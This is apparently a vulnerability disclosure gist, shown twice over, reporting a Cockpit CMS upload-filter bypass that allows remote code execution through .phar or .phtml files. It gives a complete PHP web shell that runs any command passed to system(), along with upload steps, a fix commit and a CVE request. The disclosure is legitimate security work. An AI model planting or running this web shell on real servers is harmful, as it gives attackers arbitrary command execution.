CHOOCS/gist:fe1227443544d5d74c33982814f290af Secret

## gistfile1.txt
Based on the commit from github, https://github.com/Cockpit-HQ/Cockpit/commit/becca806c7071ecc732521bb5ad0bb9c64299592

The upload filter of cockpit assets is insufficient where attacker can use different extension to bypass the upload filter to execute Remove Code Execution (RCE) It is advisable to use whitelist method to filter the extension.

Proof of Concept:
Step 1: Create a file called evil.phar / evil.phtml (Both of these extension are able to bypass the filtering)

```
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if($_GET['cmd'])
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```
Paste the above code as content inside the file

Step 2: Login as user
Step 3: Go to Assets
Step 4: Upload Assets
Step 5: Upload both files to the web application
Step 6: Copy asset link and paste it at a new tab.
Step 7: Able to execute any commands.

===========================================================
Previously, I have submitted at Huntr Dev and the maintainer fixed the issue and doesn't respond to me, so Huntr Dev can't assign a CVE for me. I wonder if Synk can help me publish this and assign to me a CVE?

Here is the reference:
https://huntr.com/bounties/53a18fa1-19af-425c-8458-9b03911178f2

Here is the fixed commit code:
https://github.com/Cockpit-HQ/Cockpit/commit/984ef9ad270357b843af63c81db95178eae42cae

Fix:
Update the Cockpit version to v2.10.2
	Based on the commit from github, https://github.com/Cockpit-HQ/Cockpit/commit/becca806c7071ecc732521bb5ad0bb9c64299592

	The upload filter of cockpit assets is insufficient where attacker can use different extension to bypass the upload filter to execute Remove Code Execution (RCE) It is advisable to use whitelist method to filter the extension.

	Proof of Concept:
	Step 1: Create a file called evil.phar / evil.phtml (Both of these extension are able to bypass the filtering)

	```
	<html>
	<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
	<input type="TEXT" name="cmd" id="cmd" size="80">
	<input type="SUBMIT" value="Execute">
	</form>
	<pre>
	<?php
	if($_GET['cmd'])
	{
	system($_GET['cmd']);
	}
	?>
	</pre>
	</body>
	<script>document.getElementById("cmd").focus();</script>
	</html>
	```
	Paste the above code as content inside the file

	Step 2: Login as user
	Step 3: Go to Assets
	Step 4: Upload Assets
	Step 5: Upload both files to the web application
	Step 6: Copy asset link and paste it at a new tab.
	Step 7: Able to execute any commands.

	===========================================================
	Previously, I have submitted at Huntr Dev and the maintainer fixed the issue and doesn't respond to me, so Huntr Dev can't assign a CVE for me. I wonder if Synk can help me publish this and assign to me a CVE?

	Here is the reference:
	https://huntr.com/bounties/53a18fa1-19af-425c-8458-9b03911178f2

	Here is the fixed commit code:
	https://github.com/Cockpit-HQ/Cockpit/commit/984ef9ad270357b843af63c81db95178eae42cae

	Fix:
	Update the Cockpit version to v2.10.2